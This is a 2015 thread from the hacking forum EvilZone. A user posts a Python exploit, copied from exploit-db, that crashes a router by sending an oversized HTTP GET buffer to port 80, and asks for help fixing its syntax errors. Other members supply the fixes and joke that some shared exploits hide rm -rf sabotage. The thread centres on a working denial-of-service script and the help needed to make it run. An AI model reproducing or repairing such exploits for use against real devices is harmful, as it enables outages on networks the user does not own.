EvilZone

Community => General discussion => : FurqanHanif May 03, 2015, 09:39:53 PM

: Somone Help me To fix the Below CODE
: FurqanHanif May 03, 2015, 09:39:53 PM
i am Trying To run This Exploit but i 'm getting Syntax error when i Run it, some one help me to fix this Code..
i am Getting syntax Error on line 14 ...  :(

: (python)
#!/bin/python
import socket
import struct
 
# This will crash the router.
# In some devices it takes about 10 minutes until functionality is restored.
 
buffer = "\x41" * 6000            # Original fuzzing buffer.
host = "192.168.15.25"
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
 
payload = GET /" + buffer + " HTTP / 1.1 \r\n "
payload += ("Host: %s \r\n\r\n", % host)
 
s.send(payload)
s.close()

Original Post.
https://www.exploit-db.com/exploits/34102/
: Re: Somone Help me To fix the Below CODE
: TheWormKill May 03, 2015, 09:47:19 PM
i am Trying To run This Exploit but i 'm getting Syntax error when i Run it, some one help me to fix this Code..
i am Getting syntax Error on line 14 ...  :(

Original Post.
https://www.exploit-db.com/exploits/34102/ (https://www.exploit-db.com/exploits/34102/)
line 14 should be
:
payload = "GET /" + buffer + " HTTP / 1.1 \r\n "instead of
:
payload = GET /" + buffer + " HTTP / 1.1 \r\n "That shouldn't be that hard to see, since the GET-part is a string constant that has to be enclosed in quotes.
: Re: Somone Help me To fix the Below CODE
: FurqanHanif May 03, 2015, 09:53:18 PM
Now Error in Line 15... :(

File "buffer.py", line 15
    payload += ("Host: %s \r\n\r\n", % host)
                                     ^
SyntaxError: invalid syntax
: Re: Somone Help me To fix the Below CODE
: TheWormKill May 03, 2015, 09:55:35 PM
Remove the comma and the brackets and learn to code your own exploits, so you don't have to rely on others' shitty and obviously untested code.
: Re: Somone Help me To fix the Below CODE
: Kulverstukas May 04, 2015, 06:50:55 AM
Remove the comma and the brackets and learn to code your own exploits, so you don't have to rely on others' shitty and obviously untested code.
Some people like to leave intentional bugs and obvious logic flaws so that people like OP ask questions how to run it and get laughed at. More evil people embed obfuscated rm -rf code into some overflow exploits so that stupid people mindlessly running them would self-destruct :D